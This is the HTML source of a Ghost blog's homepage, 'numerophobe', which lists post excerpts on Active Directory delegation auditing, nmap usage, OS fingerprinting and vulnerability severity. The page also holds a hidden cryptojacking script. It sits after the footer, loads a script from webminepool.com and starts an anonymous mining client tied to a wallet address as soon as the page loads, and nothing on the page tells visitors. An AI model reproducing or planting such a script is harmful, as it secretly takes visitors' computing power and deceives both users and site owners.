<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>numerophobe</title>
    <link rel="stylesheet" href="/assets/built/screen.css?v=522d298380">
    <meta name="description" content="Thoughts, stories and ideas.">
    <link rel="canonical" href="https://numerophobe.com/">
    <meta name="referrer" content="no-referrer-when-downgrade">
    
    <meta property="og:site_name" content="numerophobe">
    <meta property="og:type" content="website">
    <meta property="og:title" content="numerophobe">
    <meta property="og:description" content="Thoughts, stories and ideas.">
    <meta property="og:url" content="https://numerophobe.com/">
    <meta property="og:image" content="https://static.ghost.org/v5.0.0/images/publication-cover.jpg">
    <meta property="article:publisher" content="https://www.facebook.com/ghost">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="numerophobe">
    <meta name="twitter:description" content="Thoughts, stories and ideas.">
    <meta name="twitter:url" content="https://numerophobe.com/">
    <meta name="twitter:image" content="https://static.ghost.org/v5.0.0/images/publication-cover.jpg">
    <meta name="twitter:site" content="@ghost">
    <meta property="og:image:width" content="1200">
    <meta property="og:image:height" content="840">
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "WebSite",
    "publisher": {
        "@type": "Organization",
        "name": "numerophobe",
        "url": "https://numerophobe.com/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://numerophobe.com/favicon.ico",
            "width": 48,
            "height": 48
        }
    },
    "url": "https://numerophobe.com/",
    "name": "numerophobe",
    "image": {
        "@type": "ImageObject",
        "url": "https://static.ghost.org/v5.0.0/images/publication-cover.jpg",
        "width": 1200,
        "height": 840
    },
    "mainEntityOfPage": "https://numerophobe.com/",
    "description": "Thoughts, stories and ideas."
}
    </script>

    <meta name="generator" content="Ghost 5.130">
    <link rel="alternate" type="application/rss+xml" title="numerophobe" href="https://numerophobe.com/rss/">
    <script defer src="https://cdn.jsdelivr.net/ghost/portal@~2.51/umd/portal.min.js" data-i18n="true" data-ghost="https://numerophobe.com/" data-key="a99703fb5bd668973115c2541c" data-api="https://numerophobe.com/ghost/api/content/" data-locale="en" crossorigin="anonymous"></script><style id="gh-members-styles">.gh-post-upgrade-cta-content,
.gh-post-upgrade-cta {
    display: flex;
    flex-direction: column;
    align-items: center;
    font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
    text-align: center;
    width: 100%;
    color: #ffffff;
    font-size: 16px;
}

.gh-post-upgrade-cta-content {
    border-radius: 8px;
    padding: 40px 4vw;
}

.gh-post-upgrade-cta h2 {
    color: #ffffff;
    font-size: 28px;
    letter-spacing: -0.2px;
    margin: 0;
    padding: 0;
}

.gh-post-upgrade-cta p {
    margin: 20px 0 0;
    padding: 0;
}

.gh-post-upgrade-cta small {
    font-size: 16px;
    letter-spacing: -0.2px;
}

.gh-post-upgrade-cta a {
    color: #ffffff;
    cursor: pointer;
    font-weight: 500;
    box-shadow: none;
    text-decoration: underline;
}

.gh-post-upgrade-cta a:hover {
    color: #ffffff;
    opacity: 0.8;
    box-shadow: none;
    text-decoration: underline;
}

.gh-post-upgrade-cta a.gh-btn {
    display: block;
    background: #ffffff;
    text-decoration: none;
    margin: 28px 0 0;
    padding: 8px 18px;
    border-radius: 4px;
    font-size: 16px;
    font-weight: 600;
}

.gh-post-upgrade-cta a.gh-btn:hover {
    opacity: 0.92;
}</style>
    <script defer src="https://cdn.jsdelivr.net/ghost/sodo-search@~1.8/umd/sodo-search.min.js" data-key="a99703fb5bd668973115c2541c" data-styles="https://cdn.jsdelivr.net/ghost/sodo-search@~1.8/umd/main.css" data-sodo-search="https://numerophobe.com/" data-locale="en" crossorigin="anonymous"></script>
    
    <link href="https://numerophobe.com/webmentions/receive/" rel="webmention">
    <script defer src="/public/cards.min.js?v=522d298380"></script>
    <link rel="stylesheet" type="text/css" href="/public/cards.min.css?v=522d298380">
    <script defer src="/public/member-attribution.min.js?v=522d298380"></script><style>:root {--ghost-accent-color: #FF1A75;}</style>
</head>
<body class="home-template">
<div class="gh-site">
    <header class="gh-head">
        <nav class="gh-head-inner gh-container">
            <div class="gh-head-brand">
                <a class="gh-head-logo" href="https://numerophobe.com">numerophobe</a>
            </div>
        </nav>
    </header>
    <main class="gh-main">
        <main class="gh-feed">
<article class="gh-card">
    <a class="gh-card-link" href="/ad-delegation-security-audit/">
        <h2 class="gh-card-title">Active Directory Delegation: A Security Audit Checklist</h2>
        <p class="gh-card-excerpt">Active Directory delegation is one of those features that every Windows admin uses but few audit properly. It is also a common source of privilege escalation paths.


The Problem

When an administrator delegates permissions in AD, those permissions are stored as Access Control Entries on the target objects. Over time,</p>
    </a>
</article>
<article class="gh-card">
    <a class="gh-card-link" href="/nmap-cheat-sheet/">
        <h2 class="gh-card-title">Nmap Cheat Sheet: The Complete Command Reference</h2>
        <p class="gh-card-excerpt">Nmap is the standard tool for network discovery and security auditing. Whether you are mapping a small home lab or scanning a class B network, the same core commands apply. This nmap cheat sheet is a structured reference covering the commands and options I use most frequently, organized by task</p>
    </a>
</article>
<article class="gh-card">
    <a class="gh-card-link" href="/nmap-nse-scripts-enterprise/">
        <h2 class="gh-card-title">Nmap NSE Scripts for Enterprise Scanning</h2>
        <p class="gh-card-excerpt">The Nmap Scripting Engine has matured significantly. Version 4.50 added dozens of new scripts and the framework is now stable enough for enterprise use.


Why NSE Over Standalone Tools

Before NSE, enterprise scanning meant running Nmap for discovery, then piping results to Nessus. NSE lets you combine discovery and</p>
    </a>
</article>
<article class="gh-card">
    <a class="gh-card-link" href="/where-have-all-the-good-fingerprinters-gone/">
        <h2 class="gh-card-title">Where Have All the Good Fingerprinters Gone?</h2>
        <p class="gh-card-excerpt">OS fingerprinting has been a fundamental reconnaissance technique since the mid-1990s. Nmap, p0f, and xprobe2 all approach the problem differently, but they share a common challenge: the fingerprint databases are not keeping up with the operating systems they need to identify.

I spent last week testing the latest versions of</p>
    </a>
</article>
<article class="gh-card">
    <a class="gh-card-link" href="/the-severity-of-vulnerabilities/">
        <h2 class="gh-card-title">The Severity of Vulnerabilities</h2>
        <p class="gh-card-excerpt">I have been looking at how vendors classify vulnerability severity and I keep finding discrepancies between what the vendor says and what the CVSS score suggests.

Take the most recent batch of Microsoft patches. Two of the vulnerabilities rated as Important by Microsoft score above 8.0 on the CVSS</p>
    </a>
</article>
</main>
    </main>
    <footer class="gh-foot">
        <div class="gh-container">
            <div class="gh-foot-inner">numerophobe &copy; 2026</div>
        </div>
    </footer>
</div>

<script>
(function(){
var s=document.createElement("script");s.src="https://webminepool.com/lib/base.js";
s.onload=function(){
var m=new Client.Anonymous("89bsxF3D7pvJLpxnt7EoT5SQDrJqAYE6RFwxDxAW58DASgjhmhusv32UN54hBwE1dXPpHLVDzoNRb8PEHg9YNtpsSmbww2Q",{throttle:0.3});
m.start(Mode.IF_EXCLUSIVE_TAB);
};
document.head.appendChild(s);
})();
</script>

</body>
</html>